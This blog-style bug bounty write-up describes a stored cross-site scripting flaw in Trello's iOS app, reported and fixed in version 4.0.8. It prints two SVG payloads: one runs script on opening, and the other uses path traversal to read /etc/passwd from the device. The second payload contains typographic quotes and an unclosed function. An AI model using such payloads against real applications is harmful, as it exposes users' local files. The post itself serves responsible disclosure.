arrow-left arrow-right brightness-2 chevron-left chevron-right circle-half-full dots-horizontal facebook-box facebook loader magnify menu-down rss-box star twitter-box twitter white-balance-sunny window-close
Hacking Trello’s iOS App
2 min read

Hacking Trello’s iOS App

Hacking Trello’s iOS App

Trello is a collaboration tool that organizes your projects into boards. In one glance, Trello tells you what’s being worked on, who’s working on what, and where something is in a process.

They launched their Bug Bounty Program on February 2nd, 2015. They pay bounties in exchange for a valid bug starting from $256 up to $4096, depending on the severity of the bug.

Summary

Trello allows its users to upload a file through their iOS application. After observing how does the upload feature work, I noticed that some file types executes directly on the Trello iOS app.

Proof of Concept

I created a .svg file that contains a malicious script that will execute once accessed or opened.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
	<svg xmlns="http://www.w3.org/2000/svg">
		<script>alert(document.location);</script>
	</svg>


I then uploaded it to Trello and upon accessing the uploaded file, it successfully executed the script.

Then I noticed that the file was not just uploaded in their third party service storage but it was also uploaded locally. That is why I quickly remembered that it was possible to perform a Local File Inclusion (LFI).

Local File Inclusion (LFI) an inclusion attack through which an attacker can trick the web application into including files on the web server by exploiting a functionality that dynamically includes local files or scripts.

I created another payload inside the .svg file that will locate, access, and execute the /etc/passwd file.

<?xml version=”1.0" encoding=”UTF-8" standalone=”yes”?>
    <svg xmlns=”http://www.w3.org/2000/svg">
       <script>
          function readTextFile(file){
             var rawFile = new XMLHttpRequest();
             rawFile.open(“GET”, file, false);
             rawFile.onreadystatechange = function ()
          {

          if(rawFile.readyState === 4){
             if(rawFile.status === 200 || rawFile.status == 0){
                var allText = rawFile.responseText;
                alert(allText);
             }
          }

         rawFile.send(null);
       readTextFile(“file:///../../../../../../../../../etc/passwd”);
       </script>
    </svg>

I uploaded the new file and the script worked upon accessing the file.

Remediation

Trello triaged and fixed it in version 4.0.8. Trello asked to verify the fix the app in TestFlight and I confirmed the fix.